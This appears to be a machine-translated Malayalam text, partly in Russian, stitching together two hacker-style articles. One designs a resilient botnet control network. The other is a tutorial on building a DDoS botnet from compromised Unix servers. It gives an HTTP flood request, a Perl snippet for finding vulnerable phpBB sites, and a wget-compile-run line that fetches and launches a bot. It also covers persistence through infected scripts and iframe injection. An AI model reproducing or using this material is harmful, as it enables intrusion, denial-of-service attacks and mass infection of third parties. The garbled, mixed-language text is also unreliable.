തീർച്ചയായും, എനിക്ക് തെറ്റായിരിക്കാം, പക്ഷേ എന്റെ അഭിപ്രായത്തിൽ, p2p ബോട്ട്‌നെറ്റുകൾ ട്രാസ്ട്രിംഗിനേക്കാൾ വളരെ മോശമാണ്. ഒരുപക്ഷേ ആന്റിവൈറസുകളുടെ നിർമ്മാതാക്കൾ എന്തെങ്കിലും മിണ്ടാതിരിക്കുമോ?

5. സമ്പൂർണ്ണ പരിഹാരം

പുതിയതും നല്ലതുമായ എന്തെങ്കിലും കണ്ടുപിടിക്കുന്നതിനുള്ള ഒരു മാർഗം പഴയത് മറികടക്കുക എന്നതാണ്. ഞങ്ങൾ ഒരു ഫോൺ, ഒരു കമ്പ്യൂട്ടർ, ഒരു ടേപ്പ് റെക്കോർഡർ, ഒരു ക്യാമറ, ഒരു കാംകോർഡർ എന്നിവ സംയോജിപ്പിച്ചു - ഞങ്ങൾക്ക് ഒരു സ്മാർട്ട്ഫോൺ ലഭിച്ചു. കാറിൽ കമ്പ്യൂട്ടറും കാലാവസ്ഥാ നിയന്ത്രണവും ഉള്ള ആരെയും നിങ്ങൾ അതിശയിപ്പിക്കില്ല. എല്ലാ തൈരിലും ഒരു ഫ്രിഡ്ജ് മാഗ്നറ്റ് ഒട്ടിക്കുക, വിൽപ്പന കുതിച്ചുയരും.

ക്രോസിംഗ് വിജയിച്ചില്ലെങ്കിൽ, ഒന്നിനും കൊള്ളാത്ത ഒരു വ്യക്തിയെ നമുക്ക് ലഭിക്കും എന്നത് ഓർത്തിരിക്കേണ്ടത് പ്രധാനമാണ്. ജനിതക അൽഗോരിതം പോലെ തോന്നുന്നു, അല്ലേ? നമുക്ക് നല്ലതായി തോന്നുന്ന ഒരു ആശയം എടുക്കാം - ഒരു p2p ബോട്ട്നെറ്റ്, അയൽക്കാരെ നിയമിക്കുന്നതിന് ട്രാസ്ട്രിംഗ് ഉത്തരവാദിയാണ്. അപ്പോൾ ഞങ്ങൾക്ക് ഒരു സെർവറും ആവശ്യമില്ല!

എന്നാൽ ഈ സാഹചര്യത്തിൽ, നടപ്പാക്കലിന്റെ സങ്കീർണ്ണത കൂടുതലല്ലെങ്കിലും വർദ്ധിക്കും. p2p ബോട്ട്‌നെറ്റിന്റെ ശേഷിക്കുന്ന പ്രശ്നങ്ങൾ പരിഹരിക്കപ്പെടാതെ തുടരും. വിജയം നിസ്സാരമാണ്, സ്കോർ 1:1 ആണ്.

ഒരു പേപ്പറും പെൻസിലുമായി കുറച്ചു നേരം ഇരുന്നപ്പോൾ താഴെ പറയുന്ന ആശയം ഞാൻ ജനിപ്പിച്ചു. എനിക്കറിയാവുന്നിടത്തോളം, ഇത് ഇതുവരെ ശബ്ദിച്ചിട്ടില്ല, ഇത് ആദ്യം കൊണ്ടുവന്നത് ഞാനാണ്. എച്ച്ആർ പ്ലസ് 100.

നെറ്റ്‌വർക്കിന് രണ്ട് അവസ്ഥകൾ ഉണ്ടെങ്കിൽ എന്തുചെയ്യും - "സജീവവും" "നിഷ്ക്രിയവും". ഒരു നിഷ്ക്രിയ അവസ്ഥയിൽ, ബോട്ട്നെറ്റ് p2p സ്കീം അനുസരിച്ച് പ്രവർത്തിക്കുന്നു. ബോട്ട്മാസ്റ്റർ "സൈനികരെ അണിനിരത്തുക" എന്ന കമാൻഡ് അയയ്‌ക്കുകയും നെറ്റ്‌വർക്ക് ഒരു ട്രാസ്ട്രിംഗായി മാറുകയും ചെയ്യുന്നു. അവന്റെ കമാൻഡിൽ, ബോട്ട്മാസ്റ്റർ ട്രേസിംഗ് നോഡുകളും നെറ്റ്‌വർക്ക് അതിന്റെ അവസ്ഥ മാറ്റുന്ന സമയവും വ്യക്തമാക്കണം. മോതിരം വലുതാക്കാൻ, അയൽവാസികൾക്ക് പേരിടാൻ നിങ്ങൾക്ക് നിരവധി ബോട്ടുകൾക്ക് നിർദ്ദേശം നൽകാം. കൂടാതെ, എല്ലാ കമാൻഡുകളും ട്രാസ്ട്രിംഗ് വഴി കൈമാറ്റം ചെയ്യപ്പെടുന്നു. പുതിയ നോഡുകളിലേക്ക് "അയൽക്കാരെ" നിയോഗിക്കുന്നതിനും അദ്ദേഹം ഉത്തരവാദിയാണ്. റിംഗിന്റെ TTL പിന്നീട് അപര്യാപ്തമാണെന്ന് തെളിയുകയാണെങ്കിൽ, ഒരു "സജീവാവസ്ഥ ദീർഘിപ്പിക്കുക" എന്ന കമാൻഡ് നൽകാവുന്നതാണ്.

അത്തരമൊരു ബോട്ട്‌നെറ്റിന് ഒരു p2p നെറ്റ്‌വർക്കിന്റെ ദോഷങ്ങളൊന്നും പാരമ്പര്യമായി ലഭിക്കില്ല, കൂടാതെ ട്രാസ്ട്രിംഗിന്റെ എല്ലാ ഗുണങ്ങളും ഇനിപ്പറയുന്നവയും ഉണ്ടായിരിക്കും:

  • ഒരു p2p നെറ്റ്‌വർക്ക് പോലെയുള്ള ddos ​​ആക്രമണങ്ങൾക്കും നെറ്റ്‌വർക്ക് ഫിൽട്ടറുകൾക്കുമുള്ള പ്രതിരോധം വർദ്ധിച്ചു.
  • നെറ്റ്‌വർക്ക് പ്രവർത്തനരഹിതമായ സമയത്ത് ബോട്ടുകളുടെ ഏറ്റവും കുറഞ്ഞ വിഭവ ഉപഭോഗം. ബോട്ട്മാസ്റ്ററിന് ട്രാസ്ട്രിംഗിന്റെ അവസ്ഥ ട്രാക്ക് ചെയ്യേണ്ടതില്ല, അതിനായി പുതിയ നോഡുകൾ തിരഞ്ഞെടുക്കുക.
  • ഒരു ട്രാസ്ട്രിംഗ് സൃഷ്ടിക്കുമ്പോൾ, നിലവിൽ ഓൺലൈനിൽ ഉള്ള നോഡുകൾ മാത്രമേ തിരഞ്ഞെടുക്കൂ. ആദ്യ ശ്രമത്തിൽ തന്നെ ബോട്ടുകൾ റിംഗുമായി ബന്ധിപ്പിക്കും (കുറച്ച് സമയത്തേക്ക്).
  • "അയൽക്കാരുടെ" ലിസ്റ്റ് ആനുകാലികമായി അപ്ഡേറ്റ് ചെയ്യുന്നു. എല്ലാം തന്നെ, താൽക്കാലിക റിംഗിൽ ഉൾപ്പെടുത്തിയിരിക്കുന്ന നോഡുകളുടെ ഐപി മുഴുവൻ ബോട്ട്നെറ്റിനും അറിയാം. അതിനാൽ യഥാർത്ഥ അയൽക്കാരിൽ ചിലർ വളരെക്കാലമായി നെറ്റ്‌വർക്കിൽ പ്രത്യക്ഷപ്പെട്ടിട്ടില്ലെങ്കിൽ ഈ നോഡുകൾ അയൽക്കാരായി പരിഗണിക്കട്ടെ.

ഇവിടെ ഞാൻ കാണുന്ന ഒരേയൊരു പോരായ്മ നടപ്പാക്കലിന്റെ സങ്കീർണ്ണതയാണ്. എന്നാൽ ഇത് ശരിക്കും ഒരു പ്രശ്നമല്ല.

6. ഓർമ്മിക്കേണ്ടത് പ്രധാനമാണ്

ഇപ്പോൾ വരെ, ചില പോയിന്റുകളെക്കുറിച്ച് ഞാൻ നിശബ്ദത പാലിച്ചു, കാരണം അവ ഒരു ബോട്ട്നെറ്റ് നിയന്ത്രിക്കുന്നതിനുള്ള പേരുള്ള ഏതെങ്കിലും രീതികളിൽ അന്തർലീനമാണ്. നിങ്ങൾ അവയിൽ ശ്രദ്ധ കേന്ദ്രീകരിക്കണം.

  • ഫയർവാൾ അല്ലെങ്കിൽ NAT കാരണം ചില നോഡുകൾക്ക് ഇൻകമിംഗ് കണക്ഷനുകൾ സ്വീകരിക്കാൻ കഴിയില്ല. കുറഞ്ഞത്, ഒരു ബോട്ട് എഴുതുമ്പോൾ ഇത് കണക്കിലെടുക്കണം. ഉദാഹരണത്തിന്, ഒരു p2p നെറ്റ്‌വർക്കിൽ കമാൻഡുകൾ വിതരണം ചെയ്യുമ്പോൾ, ബോട്ട് അതിന്റെ അയൽവാസികളുമായി ഇടയ്ക്കിടെ ബന്ധപ്പെടണം, അവരിൽ നിന്നുള്ള കമാൻഡുകൾക്കായി കാത്തിരിക്കരുത്.
  • നെറ്റ്‌വർക്കിലേക്ക് അയച്ച എല്ലാ കമാൻഡുകളും ശ്രദ്ധിച്ചുവെന്ന് കരുതണം. കുറഞ്ഞത്, താൽപ്പര്യമുള്ള ഒരാൾക്ക് ഈ ആവശ്യങ്ങൾക്കായി ബോട്ട് കോഡ് പരിഷ്കരിക്കാനാകും. എന്നിരുന്നാലും, നെറ്റ്‌വർക്കിൽ കൈമാറ്റം ചെയ്യപ്പെടുന്ന എല്ലാ ട്രാഫിക്കും എൻക്രിപ്റ്റ് ചെയ്യുന്നത് യുക്തിസഹമാണ്. കുറഞ്ഞത്, ഇത് ബോട്ട്നെറ്റിന്റെ വിശകലനത്തെ സങ്കീർണ്ണമാക്കും.
  • എല്ലാ ബോട്ട്മാസ്റ്റർ കമാൻഡുകളും ഡിജിറ്റലായി ഒപ്പിട്ടിരിക്കണം. പാസ്‌വേഡുകൾ നല്ലതല്ല, കാരണം അവ തടസ്സപ്പെടുത്താൻ കഴിയും.
  • ഞങ്ങൾ നടപ്പിലാക്കുന്നതിനെക്കുറിച്ചാണ് സംസാരിക്കുന്നത് എന്നതിനാൽ, ഏതൊരു ബോട്ട്നെറ്റിനും കുറഞ്ഞത് മൂന്ന് കമാൻഡുകളെങ്കിലും ഉണ്ടായിരിക്കണം - ബോട്ടുകൾ അപ്ഡേറ്റ് ചെയ്യുക, ബോട്ട്മാസ്റ്റർ കീ അപ്ഡേറ്റ് ചെയ്യുക, മുഴുവൻ നെറ്റ്വർക്കിനെയും സ്വയം നശിപ്പിക്കുക.
  • നെറ്റ്വർക്കിൽ "സ്പൈ" നോഡുകൾ ഉണ്ട്. അവയിൽ ചിലത് ട്രാസ്ട്രിംഗിൽ ഉൾപ്പെടുത്തിയിട്ടുണ്ട്. അതേ സമയം, ഈ "ചാരന്മാർ" പിന്തുടരുന്ന ലക്ഷ്യങ്ങൾ ഞങ്ങൾക്കറിയില്ല - ഇത് ബോട്ട്മാസ്റ്ററിന്റെ ഐപി നിർണ്ണയിക്കുക, കമാൻഡുകൾ നടപ്പിലാക്കുന്നത് തടസ്സപ്പെടുത്തുക, നെറ്റ്‌വർക്ക് പ്രവർത്തനരഹിതമാക്കുക, ബോട്ട്നെറ്റിന്റെ നിയന്ത്രണം നേടുക തുടങ്ങിയവയായിരിക്കാം. പ്രത്യേകിച്ചും, എല്ലാ സമയത്തും ഒരേ ഒന്ന് ഉപയോഗിക്കുന്നതിനുപകരം, റിംഗിലേക്ക് കണക്റ്റുചെയ്യുമ്പോൾ ബോട്ടുകൾ ഒരു റാൻഡം നോഡ് തിരഞ്ഞെടുക്കണം എന്നാണ് ഇതിനർത്ഥം.
  • ചിത്രത്തിൽ, ട്രേസിംഗ് നോഡുകൾ പരസ്പരം ബന്ധിപ്പിച്ചിരിക്കുന്നു, എന്നാൽ ഒരു ചെറിയ പി 2 പി നെറ്റ്‌വർക്കിന്റെ രൂപത്തിൽ റിംഗ് നടപ്പിലാക്കുന്നത് കൂടുതൽ പ്രായോഗികമാണ്, അതായത് “അയൽക്കാർ” തത്വമനുസരിച്ച്.

HTTP പ്രോട്ടോക്കോൾ ഉപയോഗിക്കുമ്പോൾ സൊല്യൂഷനുകൾ 1 ഉം 2 ഉം (സെർവർ, പല സെർവറുകൾ) പല മൈനസുകളും നഷ്‌ടപ്പെടുകയും സൊല്യൂഷൻ 3 (ട്രാസ്ട്രിംഗ്) ൽ നിന്ന് രണ്ട് പ്ലസ് ലഭിക്കുകയും ചെയ്യുന്നു. ഞാൻ എന്താണ് ഉദ്ദേശിക്കുന്നതെന്ന് മനസിലാക്കാൻ ഈ ഖണ്ഡികകളിലൂടെ വീണ്ടും സ്ക്രോൾ ചെയ്യുക.

7. നിഗമനങ്ങൾ

ചെറിയ നെറ്റ്‌വർക്കുകൾക്ക് ഐആർസി ഉപയോഗിക്കുന്നതാണ് നല്ലൊരു പരിഹാരം. ഉദാഹരണത്തിന്, വിതരണം ചെയ്‌ത കമ്പ്യൂട്ടിംഗിനായി നിങ്ങളുടേതായ ചെറിയ നെറ്റ്‌വർക്ക് സൃഷ്‌ടിക്കാൻ നിങ്ങൾ ആഗ്രഹിക്കുന്നുവെങ്കിൽ, നിങ്ങളുടെ ഹോം കമ്പ്യൂട്ടർ, ലാപ്‌ടോപ്പ്, നെറ്റ്‌ബുക്ക്, വർക്ക് കമ്പ്യൂട്ടർ (കമ്പനി നയം അനുവദിക്കുകയാണെങ്കിൽ) എന്നിവയിൽ ഒരു ബോട്ട് ഇൻസ്റ്റാൾ ചെയ്യുകയും DalNet വഴി നെറ്റ്‌വർക്ക് നിയന്ത്രിക്കുകയും ചെയ്യുക. ആവശ്യമെങ്കിൽ, പിന്നീട് നെറ്റ്വർക്ക് ട്രാസ്ട്രിംഗിലേക്ക് "പമ്പ്" ചെയ്യാം. നിങ്ങൾ ഉചിതമായ കമാൻഡ് നൽകും, അല്ലേ?

ഒരു ബോട്ട്നെറ്റിന് മനോഹരമായ ഒരു വെബ് ഇന്റർഫേസ് ആവശ്യമുണ്ടെങ്കിൽ, വെബ് സെർവറിൽ നിന്ന് കമാൻഡുകൾ എടുത്ത് IRC-ലേക്ക് അയയ്ക്കുന്ന ഒരു അധിക പ്രോഗ്രാം എഴുതുന്നത് അർത്ഥമാക്കാം. കുറഞ്ഞത് ഈ സമീപനമെങ്കിലും പരിഗണിക്കുക.

ട്രാസ്ട്രിംഗ്, p2p+trastring എന്നിവയാണ് സാർവത്രിക പരിഹാരങ്ങൾ. 1 അല്ലെങ്കിൽ 1,000,000, സെർവറുകൾ ഇല്ലാതെ എത്ര നോഡുകൾ ഉണ്ടെങ്കിലും അത്തരം നെറ്റ്‌വർക്കുകൾ മികച്ച രീതിയിൽ പ്രവർത്തിക്കും.

മോതിരവുമായി താരതമ്യപ്പെടുത്തുമ്പോൾ "പ്യുവർ പി 2 പി" യുടെ വ്യക്തമായ പോരായ്മകൾ കാരണം, ഇത് ഒരു നല്ല പരിഹാരമായി കണക്കാക്കുന്നത് എന്തുകൊണ്ടാണെന്ന് എനിക്ക് വ്യക്തമല്ല. തീർച്ചയായും നെറ്റ്‌വർക്ക് നിർമ്മിക്കുന്ന ബോട്ടുകൾക്ക് ധാരാളം ഉപയോഗപ്രദമായ സവിശേഷതകൾ ഉണ്ട്. എന്തുകൊണ്ട് മറ്റൊരു ചെറിയ പേലോഡ് ചേർക്കരുത് - നെറ്റ്‌വർക്ക് മൊബിലൈസേഷൻ ട്രാസ്ട്രിംഗിലേക്ക്?

അത്, ഒരുപക്ഷേ, എല്ലാം. നിങ്ങളുടെ ഏത് അഭിപ്രായത്തിലും ഞാൻ സന്തോഷിക്കും. പ്രത്യേകിച്ചും വിമർശനം, വാചകത്തിലെ കൃത്യതയില്ലായ്മ / പൊരുത്തക്കേടുകൾ, ഉന്നയിച്ച വിഷയത്തെക്കുറിച്ചുള്ള നിങ്ങളുടെ ആശയങ്ങൾ എന്നിവ ചൂണ്ടിക്കാണിക്കുന്നു.

സംരക്ഷണ സംവിധാനങ്ങൾ നിരന്തരം മെച്ചപ്പെടുത്തുന്നു, പ്രോഗ്രാമർമാർ കൂടുതൽ പരിചയസമ്പന്നരാകുന്നു. അറിയപ്പെടുന്ന തെറ്റുകൾ കുറവാണ് ഇപ്പോൾ സംഭവിക്കുന്നത്.

[ആമുഖം]
ഇന്റർനെറ്റ് വലിയ ശക്തിയോടെ വളരുന്നു. ഒരു ഹാക്കർക്ക് കേടുപാടുകൾ കണ്ടെത്തുന്നത് കൂടുതൽ ബുദ്ധിമുട്ടാണ്. വികസനം സംരക്ഷിക്കാൻ അഡ്മിൻമാർ ഏറ്റവും മികച്ച സുരക്ഷാ വിദഗ്ധരെ ഉപയോഗിക്കുന്നു. നിങ്ങളുടെ ചിന്തകൾ നിങ്ങൾ തിരിച്ചറിയുന്നുണ്ടോ? വാസ്തവത്തിൽ, ഇൻറർനെറ്റ് കേടുപാടുകൾ നിറഞ്ഞതാണ്, പക്ഷേ അവയ്ക്ക് കാര്യമായ പ്രയോജനമില്ല. ശരി, ഇവിടെ എങ്ങനെ നോക്കാം, സാഹചര്യം സങ്കൽപ്പിക്കുക, ചില നെറ്റ്‌വർക്ക് ബാസ്റ്റാർഡ് നിങ്ങളെ പിടികൂടി, നിങ്ങൾ അവനെ ശിക്ഷിക്കാൻ ആഗ്രഹിക്കുന്നു. ഇന്ന് നമ്മൾ നിങ്ങളുടെ സ്വന്തം കോംബാറ്റ് ബോട്ട്നെറ്റ് സൃഷ്ടിക്കുന്നതിനെക്കുറിച്ച് സംസാരിക്കും.
അപ്പോൾ എന്താണ് "ബോട്ട്"? രണ്ട് മിനിറ്റിനുള്ളിൽ നിങ്ങൾ ഷൂട്ട് ചെയ്യുന്ന കമ്പ്യൂട്ടർ ഗെയിമുകളിലെ മണ്ടൻ എതിരാളികളെ ഒരു അജ്ഞാത വ്യക്തി ഉടൻ ഓർമ്മിക്കുന്നു. അതെ, ഇത് ഭാഗികമായി ശരിയാണ്. ഞങ്ങളുടെ കാര്യത്തിൽ, "bot" എന്നത് അതിൽ ഉൾച്ചേർത്ത കമാൻഡുകൾ നടപ്പിലാക്കുന്ന ഒരു പ്രോഗ്രാമാണ്. പ്രത്യേകിച്ചൊന്നുമില്ല പോലെ. ആരെങ്കിലും എതിർക്കും: "ഞാൻ, അവർ പറയുന്നു, അഞ്ചാം വയസ്സിൽ ഇത് എഴുതി, നിങ്ങൾ ബട്ടൺ അമർത്തി പ്രോഗ്രാം, ഒല്യ-ല, അടയ്ക്കുന്നു" നമുക്ക് കുട്ടിക്കാലം മറക്കാം. കോഡിംഗിന്റെ സാധ്യതകൾ അനന്തമാണെന്നും അത് നന്മയ്ക്കും തിന്മയ്ക്കും ഉപയോഗിക്കാമെന്നും നമുക്കെല്ലാവർക്കും അറിയാം. തീർച്ചയായും, ഞങ്ങൾ എല്ലായ്പ്പോഴും ഞങ്ങളുടെ വികസനങ്ങൾ നല്ല ഉദ്ദേശ്യത്തോടെ ഉപയോഗിക്കുന്നു. "ബോട്ട്നെറ്റ്" എന്നത് ഒരു കേന്ദ്രത്തിൽ ശേഖരിച്ച ബോട്ടുകളുടെ ഒരു കൂട്ടമാണ്, അത് ഉടമയുടെ കമാൻഡുകൾ സമന്വയിപ്പിക്കുന്നു. ബോട്ടുകൾ, പ്രധാനമായും വിൻഡോസ് മെഷീനുകളെയാണ് കൂടുതൽ ലക്ഷ്യമിടുന്നത്. ഇവിടെ നിങ്ങൾക്ക് പാസ്‌വേഡുകൾ മോഷ്ടിക്കാനും സോക്സുകൾ ഇൻസ്റ്റാൾ ചെയ്യാനും സ്ക്രൂ ഫോർമാറ്റ് ചെയ്യാനും കഴിയും. നിയമങ്ങളിൽ നിന്ന് വ്യതിചലിച്ച് നിക്സ് മെഷീനുകളിൽ നിന്ന് ഒരു ബോട്ട്നെറ്റ് എങ്ങനെ സൃഷ്ടിക്കാമെന്ന് ഞാൻ നിങ്ങളോട് പറയും. ഞങ്ങളുടെ ബോട്ടിന്റെ പ്രധാന പ്രവർത്തനം DDOS ആക്രമണങ്ങളുടെ ഓർഗനൈസേഷനാണ്. നിക്സ് സെർവറുകളുടെ വിശാലമായ ചാനലുകൾ ഉപയോഗിക്കുന്നതിനുള്ള ഏറ്റവും അനുയോജ്യമായ മാർഗമാണിത്. നമുക്ക് കണക്കാക്കാം. "പൂരിപ്പിക്കേണ്ട" സെർവർ 100Mb ചാനലിലാണ്. അതായത്, ഒരേ ചാനലിൽ നിൽക്കുന്ന 10-20 ബോട്ടുകൾ നിമിഷനേരം കൊണ്ട് സെർവറിനെ കീഴടക്കും. നിങ്ങൾക്ക് ഒരു സെർവറിൽ നിന്ന് ഒരു ഫയർവാളിന് പിന്നിൽ മറയ്ക്കാൻ കഴിയുമെങ്കിൽ, അയ്യോ, കൂടുതൽ ബോട്ടുകളിൽ നിന്ന് രക്ഷയില്ല

[ഒരു ബോട്ട് എഴുതുന്നു]
ലേഖനത്തിന്റെ അവസാനത്തെ ലിങ്കിൽ നിങ്ങൾക്ക് ഒരു ഉദാഹരണ ബോട്ടിന്റെ ഒരു ലിസ്റ്റ് കണ്ടെത്താം. നമുക്ക് കോഡ് നോക്കാം. (ഉം, IRC വഴി വീണ്ടും ഡ്രീം നിയന്ത്രിക്കപ്പെടുന്നുവോ? WEB ആണ് നല്ലത്!). ആകസ്മികമായി, IRC വഴിയുള്ള നിയന്ത്രണം അതിന്റെ ഇന്ററാക്റ്റിവിറ്റിക്കായി തിരഞ്ഞെടുത്തു. ഒരു ബോട്ട്‌നെറ്റിലെ രണ്ട് സെർവറുകളിൽ ലോക്കൽ ന്യൂക്ലിയർ എക്‌സ്‌പ്ലോയിറ്റുകൾ ഉപയോഗിക്കാൻ ഞാൻ ആഗ്രഹിക്കുന്നുവെന്ന് പറയാം. ഞാൻ ബോട്ട് ഉപയോഗിച്ച് SH uname -a കമാൻഡ് നടപ്പിലാക്കുകയും എനിക്ക് ആവശ്യമുള്ള കമ്പ്യൂട്ടർ തൽക്ഷണം കണ്ടെത്തുകയും ചെയ്യും. തുടർന്ന്, IRC ക്ലയന്റിലും കമാൻഡ് എക്സിക്യൂട്ട് ചെയ്ത ശേഷം, ഞാൻ ബാക്ക്ഡോർ ഡൗൺലോഡ് ചെയ്യുകയും തുടർ പ്രവർത്തനങ്ങൾക്കായി ഒരു ഇന്ററാക്റ്റീവ് ഷെൽ നേടുകയും ചെയ്യും. സാധ്യതകൾ അനന്തമാണ്. അത്തരം നിയന്ത്രണം WEB വഴിയും നടപ്പിലാക്കാമെന്ന് നിങ്ങൾ പറയും, പക്ഷേ പേജ് വീണ്ടും ലോഡുചെയ്‌ത് ട്രാഫിക് പാഴാക്കുന്നത് എന്തുകൊണ്ട്? എല്ലാം തത്സമയം നിരീക്ഷിക്കുന്നത് വളരെ സൗകര്യപ്രദമാണ് (എന്നിരുന്നാലും, 1000-ലധികം ബോട്ടുകളുടെ ബോട്ട്‌നെറ്റ് ഉപയോഗിച്ച്, നിങ്ങൾക്ക് ഇന്റർഫേസിന്റെ സൗകര്യം പരിപാലിക്കാൻ കഴിയും - സാമാന്യബുദ്ധി കുറിപ്പ്). ഡി‌ഡി‌ഒ‌എസ് സംഘടിപ്പിക്കുന്നത് വളരെ സങ്കീർണ്ണമായ കാര്യമാണെന്ന് പലരും കരുതുന്നു. ഒരു സാധാരണ ആക്രമണത്തിനുള്ള ഒരു ഉദാഹരണ കോഡ് ഇതാ:

GET /server.org HTTP/1.0\r\nകണക്ഷൻ: Keep-Alive\r\nUser-Agent: Mozilla/4.75 (X11; U; Windows 5.2 i686)\r\nഹോസ്റ്റ്: server.org:80\r\nഅംഗീകരിക്കുക: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nഅംഗീകരിക്കുക-എൻകോഡിംഗ്: gzip\r\nഅംഗീകരിക്കുക-ഭാഷ: en\r\nഅംഗീകരിക്കുക-ചാർജറ്റ്: iso- 8859-1,*,utf-8\r\n\r\n

അതായത്, ഞങ്ങൾ സെർവറിലേക്ക് ഒരു അഭ്യർത്ഥന അയയ്‌ക്കുന്നു, അതിനോട് പ്രതികരിക്കാൻ നിർബന്ധിക്കുന്നു. മാത്രമല്ല, ട്രാഫിക് അല്ലെങ്കിൽ പ്രോസസ്സർ സമയക്കുറവ് കാരണം സെർവർ പ്രവർത്തനരഹിതമാകുന്നതുവരെ ഞങ്ങൾ ഇത് അയയ്ക്കുന്നു. എന്നാൽ നിങ്ങൾ ഒരു നിക്സ് ബോട്ടുകളിൽ പരിമിതപ്പെടുത്തിയിട്ടില്ലെങ്കിൽ, നിങ്ങൾ ഒരു വിൻഡോസ് ബോട്ട്നെറ്റ് സൃഷ്ടിക്കേണ്ടതുണ്ട്, ഉദാഹരണത്തിന്, AgoBot അടിസ്ഥാനമാക്കി. ഇത് ചെയ്യുന്നതിന്, ബോട്ട് ഇൻസ്റ്റാൾ ചെയ്തിട്ടുള്ള സെർവറുമായി ബന്ധിപ്പിക്കുന്ന lsasl / dcom മെഷീൻ കേടുപാടുകൾക്കായി സ്കാൻ ചെയ്യുന്ന ബോട്ടിനായി നിങ്ങൾക്ക് ചില കോഡ് സൃഷ്ടിക്കാൻ കഴിയും.

[ഒരു ബോട്ട്നെറ്റ് സൃഷ്ടിക്കുക]
വാസ്തവത്തിൽ, ഒരു ബോട്ട്നെറ്റ് സൃഷ്ടിക്കുന്നത് വളരെ എളുപ്പമാണ്. ഇത് ചെയ്യുന്നതിന്, ഏതെങ്കിലും വെബ് സ്ക്രിപ്റ്റിൽ ഒരു കേടുപാടുകൾ കണ്ടെത്തേണ്ടതുണ്ട്. കണ്ടെത്തിയ അപകടസാധ്യത ഷെൽ ഇന്റർപ്രെറ്റർ കമാൻഡുകൾ നടപ്പിലാക്കാൻ അനുവദിക്കണം. നിങ്ങൾ ഒരു അപകടസാധ്യത കണ്ടെത്തുമ്പോൾ, പ്രധാനപ്പെട്ട ഫയലിന്റെ പേര്, അതിന്റെ പേര്, ദുർബലമായ സിസ്റ്റത്തിന്റെ പേര് എന്നിവ ശ്രദ്ധിക്കുക. ഇപ്പോൾ, ഈ ഡാറ്റയുടെ സഹായത്തോടെ, നിങ്ങൾ ഒരു നല്ല തിരയൽ അന്വേഷണം നടത്തേണ്ടതുണ്ട്. ഉദാഹരണത്തിന്, phpBB-യിലെ അറിയപ്പെടുന്ന ഒരു ദുർബലത എടുക്കുക<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$sock = IO::Socket::INET->new(PeerAddr=>"search.aol.com",PeerPort=>"80",P ro to=>"tcp") അല്ലെങ്കിൽ അടുത്തത്; $sock പ്രിന്റ് ചെയ്യുക "GET /aolcom/search?q=viewtopic.php%3Ft%3D7&Stage=0&page=$n HTTP/1.0\n\n"; @resu=<$sock>; അടയ്ക്കുക ($ സോക്ക്);

Wget http://server.org/bot.c;gcc bot.c -o bash;chmod +x bash;./bash;

ഇവിടെ നിങ്ങൾക്ക് ഒരേസമയം രണ്ട് പ്രശ്നങ്ങൾ കാണാൻ കഴിയും. wget, gcc എന്നിവ ഇല്ലായിരിക്കാം അല്ലെങ്കിൽ അവയുടെ ഉപയോഗം നിരോധിക്കും. ഇവിടെ fech, curl and get downloads അല്ലെങ്കിൽ lynx console ബ്രൗസർ ഞങ്ങളെ സഹായിക്കും, അല്ലെങ്കിൽ ftp പ്രോട്ടോക്കോൾ ഉപയോഗിക്കുക. ഇത് നടപ്പിലാക്കുന്നത് കൂടുതൽ സങ്കീർണ്ണമാണ്, പക്ഷേ ftp എല്ലായിടത്തും ഉണ്ട് എന്നതാണ് നേട്ടം. കംപൈലറിനെ സംബന്ധിച്ചിടത്തോളം, നിങ്ങൾക്ക് നിങ്ങളുടെ ഷെല്ലിലെ ബൈനറി കംപൈൽ ചെയ്യാനും അനുയോജ്യതയോടെ എല്ലാം ശരിയാകുമെന്ന് പ്രതീക്ഷിക്കാനും അല്ലെങ്കിൽ വ്യാഖ്യാനിച്ച ഭാഷകളിൽ ബോട്ട് മാറ്റിയെഴുതാനും കഴിയും - പേൾ അല്ലെങ്കിൽ PHP. ഓരോ രീതിക്കും അതിന്റെ ഗുണങ്ങളും ദോഷങ്ങളുമുണ്ട്, ഏതാണ് ഉപയോഗിക്കേണ്ടത്, തിരഞ്ഞെടുക്കൽ നിങ്ങളുടേതാണ്. ക്യാപ്‌ചർ ചെയ്‌ത സെർവർ പരമാവധി ഉപയോഗിക്കുന്നത് ഞാൻ പതിവാണ്. എല്ലാത്തിനുമുപരി, ഒരു നിക്സ് സെർവറിലെ ഒരു ബോട്ട് മെഷീന്റെ ആദ്യ റീബൂട്ട് വരെ മാത്രമേ നിലനിൽക്കൂ. ഈ സാഹചര്യത്തിൽ നിന്ന് ഒരു രസകരമായ വഴിയുണ്ട്. എഴുതാൻ ലഭ്യമായ റീഡബിൾ ഫയലുകൾ (.pl, .php) ബോട്ട് തിരയുകയും ബോട്ടിന്റെ ഡൗൺലോഡ് കോഡ് ലോഞ്ച് ചെയ്യുകയും ചെയ്യും. അല്ലെങ്കിൽ നിങ്ങൾക്ക് മറ്റൊരു സ്ക്രൂ ബോട്ട്നെറ്റ് ഉണ്ടാക്കാം. ഇത് നടപ്പിലാക്കാനും എളുപ്പമാണ്. ഇവിടെ നമുക്ക് ഇന്റർനെറ്റ് ബ്രൗസറിൽ (ഇന്റർനെറ്റ് എക്സ്പ്ലോറർ, ഓപ്പറ, മോസില്ല) ഒരു ദുർബലത ആവശ്യമാണ്, അത് ആവശ്യമുള്ള ഫയലിന്റെ ഡൗൺലോഡും ലോഞ്ചും നയിക്കുന്നു. അടുത്തതായി, ഞങ്ങളുടെ ക്ഷുദ്ര കോഡ് ലോഡ് ചെയ്യുന്ന ഒരു ഇൻഫ്രെയിം റെക്കോർഡ് സൃഷ്ടിക്കപ്പെടുന്നു. ഈ എൻട്രി എല്ലാ ഇൻഡക്‌സ് ഫയലുകളിലേക്കും (അല്ലെങ്കിൽ html കോഡ് ഉള്ള എല്ലാറ്റിലേയ്ക്കും, എല്ലാം നിങ്ങളുടെ ധിക്കാരത്തെ ആശ്രയിച്ചിരിക്കുന്നു) ചേർത്തിരിക്കുന്നു. ആർക്കൈവറിൽ നിങ്ങൾ കണ്ടെത്തുന്ന ഒരു ചെറിയ ഹാസ് സ്‌ക്രിപ്റ്റ്, 